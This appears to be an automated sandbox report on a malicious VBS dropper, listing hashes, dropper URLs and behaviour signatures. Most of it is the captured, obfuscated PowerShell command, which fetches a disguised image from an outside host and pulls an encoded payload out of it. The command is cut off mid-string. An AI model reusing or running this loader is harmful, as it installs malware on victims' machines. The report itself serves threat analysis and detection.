eb0d4a83d4e4f3ef9e1e87ab853b71a007f8d604eeb94cb76fecde0ec6eae0ca

General

Target

seethepictureofniceworkingherethis.vbs
Size

196KB
MD5

6e4907908c89e0ccf170839aca173008
SHA1

e192fa4ccee7bb86434f3e2c6504da3eb5b8d6ad
SHA256

eb0d4a83d4e4f3ef9e1e87ab853b71a007f8d604eeb94cb76fecde0ec6eae0ca
SHA512

a4924381716d9a6a7b9f08e3e0944a71a4d12b52392fdea5b1021fedc915ee3cf8330c768703dd4a61bb5ec6ea1024e44440f92702d7cfb152a8feb00b6dace2
SSDEEP

3072:MwXK47Z/aCMMHUqDT4apeAT63vuWtBoF/0ljSXEGrw4a8z/zqkTYzQ100eCN8j62:MWO5UAWO07NmduzTSDMO2MgAf+37+

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

exe.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2760	powershell.exe
6	2760	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1636	powershell.exe
2760	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1636	powershell.exe
2760	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 1636	1708	WScript.exe	31
PID 1708 wrote to memory of 1636	1708	WScript.exe	31
PID 1708 wrote to memory of 1636	1708	WScript.exe	31
PID 1636 wrote to memory of 2760	1636	powershell.exe	33
PID 1636 wrote to memory of 2760	1636	powershell.exe	33
PID 1636 wrote to memory of 2760	1636	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\seethepictureofniceworkingherethis.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBn♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇VQBy♈ ᧽ Ⓙ ⟄ ▇Gw♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇9♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇JwBo♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bw♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇Og♈ ᧽ Ⓙ ⟄ ▇v♈ ᧽ Ⓙ ⟄ ▇C8♈ ᧽ Ⓙ ⟄ ▇aQBh♈ ᧽ Ⓙ ⟄ ▇DY♈ ᧽ Ⓙ ⟄ ▇M♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇x♈ ᧽ Ⓙ ⟄ ▇Dc♈ ᧽ Ⓙ ⟄ ▇M♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇2♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇dQBz♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇GM♈ ᧽ Ⓙ ⟄ ▇a♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇HY♈ ᧽ Ⓙ ⟄ ▇ZQ♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇cgBn♈ ᧽ Ⓙ ⟄ ▇C8♈ ᧽ Ⓙ ⟄ ▇Mg♈ ᧽ Ⓙ ⟄ ▇v♈ ᧽ Ⓙ ⟄ ▇Gk♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇cw♈ ᧽ Ⓙ ⟄ ▇v♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇ZQB3♈ ᧽ Ⓙ ⟄ ▇F8♈ ᧽ Ⓙ ⟄ ▇aQBt♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇ZwBl♈ ᧽ Ⓙ ⟄ ▇F8♈ ᧽ Ⓙ ⟄ ▇Mg♈ ᧽ Ⓙ ⟄ ▇w♈ ᧽ Ⓙ ⟄ ▇DI♈ ᧽ Ⓙ ⟄ ▇N♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇w♈ ᧽ Ⓙ ⟄ ▇Dk♈ ᧽ Ⓙ ⟄ ▇M♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇1♈ ᧽ Ⓙ ⟄ ▇C8♈ ᧽ Ⓙ ⟄ ▇bgBl♈ ᧽ Ⓙ ⟄ ▇Hc♈ ᧽ Ⓙ ⟄ ▇XwBp♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBn♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇LgBq♈ ᧽ Ⓙ ⟄ ▇H♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇Zw♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇B3♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇YgBD♈ ᧽ Ⓙ ⟄ ▇Gw♈ ᧽ Ⓙ ⟄ ▇aQBl♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇D0♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇BO♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇dw♈ ᧽ Ⓙ ⟄ ▇t♈ ᧽ Ⓙ ⟄ ▇E8♈ ᧽ Ⓙ ⟄ ▇YgBq♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇YwB0♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇UwB5♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇LgBO♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇Fc♈ ᧽ Ⓙ ⟄ ▇ZQBi♈ ᧽ Ⓙ ⟄ ▇EM♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇bgB0♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBn♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇QgB5♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇ZQBz♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇PQ♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇dwBl♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇QwBs♈ ᧽ Ⓙ ⟄ ▇Gk♈ ᧽ Ⓙ ⟄ ▇ZQBu♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇LgBE♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇dwBu♈ ᧽ Ⓙ ⟄ ▇Gw♈ ᧽ Ⓙ ⟄ ▇bwBh♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇R♈ ᧽ Ⓙ ⟄ ▇Bh♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQ♈ ᧽ Ⓙ ⟄ ▇o♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇aQBt♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇ZwBl♈ ᧽ Ⓙ ⟄ ▇FU♈ ᧽ Ⓙ ⟄ ▇cgBs♈ ᧽ Ⓙ ⟄ ▇Ck♈ ᧽ Ⓙ ⟄ ▇Ow♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇Gk♈ ᧽ Ⓙ ⟄ ▇bQBh♈ ᧽ Ⓙ ⟄ ▇Gc♈ ᧽ Ⓙ ⟄ ▇ZQBU♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇B0♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇PQ♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇Fs♈ ᧽ Ⓙ ⟄ ▇UwB5♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇LgBU♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇B0♈ ᧽ Ⓙ ⟄ ▇C4♈ ᧽ Ⓙ ⟄ ▇RQBu♈ ᧽ Ⓙ ⟄ ▇GM♈ ᧽ Ⓙ ⟄ ▇bwBk♈ ᧽ Ⓙ ⟄ ▇Gk♈ ᧽ Ⓙ ⟄ ▇bgBn♈ ᧽ Ⓙ ⟄ ▇F0♈ ᧽ Ⓙ ⟄ ▇Og♈ ᧽ Ⓙ ⟄ ▇6♈ ᧽ Ⓙ ⟄ ▇FU♈ ᧽ Ⓙ ⟄ ▇V♈ ᧽ Ⓙ ⟄ ▇BG♈ ᧽ Ⓙ ⟄ ▇Dg♈ ᧽ Ⓙ ⟄ ▇LgBH♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇BT♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇cgBp♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇Zw♈ ᧽ Ⓙ ⟄ ▇o♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇aQBt♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇ZwBl♈ ᧽ Ⓙ ⟄ ▇EI♈ ᧽ Ⓙ ⟄ ▇eQB0♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇cw♈ ᧽ Ⓙ ⟄ ▇p♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇RgBs♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇Zw♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇D0♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇Dw♈ ᧽ Ⓙ ⟄ ▇P♈ ᧽ Ⓙ ⟄ ▇BC♈ ᧽ Ⓙ ⟄ ▇EE♈ ᧽ Ⓙ ⟄ ▇UwBF♈ ᧽ Ⓙ ⟄ ▇DY♈ ᧽ Ⓙ ⟄ ▇N♈ ᧽ Ⓙ ⟄ ▇Bf♈ ᧽ Ⓙ ⟄ ▇FM♈ ᧽ Ⓙ ⟄ ▇V♈ ᧽ Ⓙ ⟄ ▇BB♈ ᧽ Ⓙ ⟄ ▇FI♈ ᧽ Ⓙ ⟄ ▇V♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇+♈ ᧽ Ⓙ ⟄ ▇D4♈ ᧽ Ⓙ ⟄ ▇Jw♈ ᧽ Ⓙ ⟄ ▇7♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇ZQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇RgBs♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇Zw♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇D0♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇Dw♈ ᧽ Ⓙ ⟄ ▇P♈ ᧽ Ⓙ ⟄ ▇BC♈ ᧽ Ⓙ ⟄ ▇EE♈ ᧽ Ⓙ ⟄ ▇UwBF♈ ᧽ Ⓙ ⟄ ▇DY♈ ᧽ Ⓙ ⟄ ▇N♈ ᧽ Ⓙ ⟄ ▇Bf♈ ᧽ Ⓙ ⟄ ▇EU♈ ᧽ Ⓙ ⟄ ▇TgBE♈ ᧽ Ⓙ ⟄ ▇D4♈ ᧽ Ⓙ ⟄ ▇Pg♈ ᧽ Ⓙ ⟄ ▇n♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇SQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQB4♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇PQ♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇aQBt♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇ZwBl♈ ᧽ Ⓙ ⟄ ▇FQ♈ ᧽ Ⓙ ⟄ ▇ZQB4♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇LgBJ♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇Z♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇Hg♈ ᧽ Ⓙ ⟄ ▇TwBm♈ ᧽ Ⓙ ⟄ ▇Cg♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇RgBs♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇Zw♈ ᧽ Ⓙ ⟄ ▇p♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇Z♈ ᧽ Ⓙ ⟄ ▇BJ♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇Z♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇Hg♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇9♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBn♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇V♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇Hg♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇Ek♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇BP♈ ᧽ Ⓙ ⟄ ▇GY♈ ᧽ Ⓙ ⟄ ▇K♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇EY♈ ᧽ Ⓙ ⟄ ▇b♈ ᧽ Ⓙ ⟄ ▇Bh♈ ᧽ Ⓙ ⟄ ▇Gc♈ ᧽ Ⓙ ⟄ ▇KQ♈ ᧽ Ⓙ ⟄ ▇7♈ ᧽ Ⓙ ⟄ ▇CQ♈ ᧽ Ⓙ ⟄ ▇cwB0♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇cgB0♈ ᧽ Ⓙ ⟄ ▇Ek♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇C0♈ ᧽ Ⓙ ⟄ ▇ZwBl♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇M♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇C0♈ ᧽ Ⓙ ⟄ ▇YQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇Ek♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇C0♈ ᧽ Ⓙ ⟄ ▇ZwB0♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇SQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQB4♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇SQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQB4♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇Kw♈ ᧽ Ⓙ ⟄ ▇9♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇RgBs♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇Zw♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇Ew♈ ᧽ Ⓙ ⟄ ▇ZQBu♈ ᧽ Ⓙ ⟄ ▇Gc♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bo♈ ᧽ Ⓙ ⟄ ▇Ds♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bi♈ ᧽ Ⓙ ⟄ ▇GE♈ ᧽ Ⓙ ⟄ ▇cwBl♈ ᧽ Ⓙ ⟄ ▇DY♈ ᧽ Ⓙ ⟄ ▇N♈ ᧽ Ⓙ ⟄ ▇BM♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇bgBn♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇a♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇D0♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇Ek♈ ᧽ Ⓙ ⟄ ▇bgBk♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇e♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇C0♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bh♈ ᧽ Ⓙ ⟄ ▇HI♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇BJ♈ ᧽ Ⓙ ⟄ ▇G4♈ ᧽ Ⓙ ⟄ ▇Z♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇Hg♈ ᧽ Ⓙ ⟄ ▇Ow♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇YQBz♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇Ng♈ ᧽ Ⓙ ⟄ ▇0♈ ᧽ Ⓙ ⟄ ▇EM♈ ᧽ Ⓙ ⟄ ▇bwBt♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇9♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bp♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBn♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇V♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇Hg♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇u♈ ᧽ Ⓙ ⟄ ▇FM♈ ᧽ Ⓙ ⟄ ▇dQBi♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇By♈ ᧽ Ⓙ ⟄ ▇Gk♈ ᧽ Ⓙ ⟄ ▇bgBn♈ ᧽ Ⓙ ⟄ ▇Cg♈ ᧽ Ⓙ ⟄ ▇J♈ ᧽ Ⓙ ⟄ ▇Bz♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇YQBy♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇SQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇ZQB4♈ ᧽ Ⓙ ⟄ ▇Cw♈ ᧽ Ⓙ ⟄ ▇I♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇YQBz♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇Ng♈ ᧽ Ⓙ ⟄ ▇0♈ ᧽ Ⓙ ⟄ ▇Ew♈ ᧽ Ⓙ ⟄ ▇ZQBu♈ ᧽ Ⓙ ⟄ ▇Gc♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bo♈ ᧽ Ⓙ ⟄ ▇Ck♈ ᧽ Ⓙ ⟄ ▇Ow♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GM♈ ᧽ Ⓙ ⟄ ▇bwBt♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇YQBu♈ ᧽ Ⓙ ⟄ ▇GQ♈ ᧽ Ⓙ ⟄ ▇QgB5♈ ᧽ Ⓙ ⟄ ▇HQ♈ ᧽ Ⓙ ⟄ ▇ZQBz♈ ᧽ Ⓙ ⟄ ▇C♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇PQ♈ ᧽ Ⓙ ⟄ ▇g♈ ᧽ Ⓙ ⟄ ▇Fs♈ ᧽ Ⓙ ⟄ ▇UwB5♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇d♈ ᧽ Ⓙ ⟄ ▇Bl♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇LgBD♈ ᧽ Ⓙ ⟄ ▇G8♈ ᧽ Ⓙ ⟄ ▇bgB2♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇cgB0♈ ᧽ Ⓙ ⟄ ▇F0♈ ᧽ Ⓙ ⟄ ▇Og♈ ᧽ Ⓙ ⟄ ▇6♈ ᧽ Ⓙ ⟄ ▇EY♈ ᧽ Ⓙ ⟄ ▇cgBv♈ ᧽ Ⓙ ⟄ ▇G0♈ ᧽ Ⓙ ⟄ ▇QgBh♈ ᧽ Ⓙ ⟄ ▇HM♈ ᧽ Ⓙ ⟄ ▇ZQ♈ ᧽ Ⓙ ⟄ ▇2♈ ᧽ Ⓙ ⟄ ▇DQ♈ ᧽ Ⓙ ⟄ ▇UwB0♈ ᧽ Ⓙ ⟄ ▇HI♈ ᧽ Ⓙ ⟄ ▇aQBu♈ ᧽ Ⓙ ⟄ ▇Gc♈ ᧽ Ⓙ ⟄ ▇K♈ ᧽ Ⓙ ⟄ ▇♈ ᧽ Ⓙ ⟄ ▇k♈ ᧽ Ⓙ ⟄ ▇GI♈ ᧽ Ⓙ ⟄ ▇YQBz♈ ᧽ Ⓙ ⟄ ▇GU♈ ᧽ Ⓙ ⟄ ▇Ng♈ ᧽ Ⓙ ⟄ ▇0♈ ᧽ Ⓙ ⟄ ▇EM♈ ᧽ Ⓙ ⟄ 